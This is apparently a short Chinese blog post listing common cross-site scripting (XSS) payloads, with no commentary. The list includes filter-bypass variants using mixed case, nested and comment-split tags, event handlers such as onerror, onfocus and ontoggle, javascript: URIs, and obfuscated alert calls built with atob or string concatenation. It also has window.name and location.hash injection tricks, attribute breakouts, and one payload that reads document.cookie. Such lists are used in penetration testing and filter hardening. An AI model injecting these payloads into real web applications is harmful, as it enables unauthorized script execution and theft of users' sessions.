一些常见的XSS的Payload

青灯古酒 发布于 2021-11-13 1864 次阅读


<SCRIPT>aLeRT(111)</sCRIpt>
<scri<script>pt>alert(111)</scri</script>pt>
<scri<!--test-->pt>alert(111)</sc<!--test-->ript>

<p onclick="alert(/xss/)">click it</p>

<video><source onerror="alert(/xss/)">

<a href="javascript:alert(/xss/)">link</a>
<details open ontoggle="alert(/xss/)">
<form><button formaction="javascript:alert(/xss/)">X</button></form>

window['alert'](/xss/)
window['al'+'ert'](/xss/)
window[atob("YWxl"+"cnQ")](/xss/)

<svg><script>alert%26%23x28;1%26%23xx29;</script></svg>

<input onfocus=outerHTML=decodeURI(location.hash)>#<img src=x onerror=alert(/xss/)>
%3Cinput%20onfocus=location=window.name%3E"name="javascript:alert(/xss/)"><iframe>

with(document)alert(cookie)
window.onerror=alert; throw 1
<img %0asrc=x%0aonerror=alert(/xss/)>
<input/onfocus=alert(/xss/)>

%3Cinput%20onfocus=eval(window.name)%3E"name="alert(/xss/)>
%3Cinput%20onfocus=$(window.name)%3E"name="<img src='x' onerror=alert(/xss/)/>"/>

stage1:<script>/*
stage2:*/alert(1)/*
stage3:*/</script>

<script>alert('xxs')</script>
<img src=1 onerror=alert(1)>
<input name="keyword" value="1"> and <script>alert('xxs')</script>
1’ onmouseover=alert(1)
<ScRiPt>alert(1)<ScRiPt>
<scscriptript>alert(1)</scscriptript>
&t_sort="type=text onmouseover="alert(1)"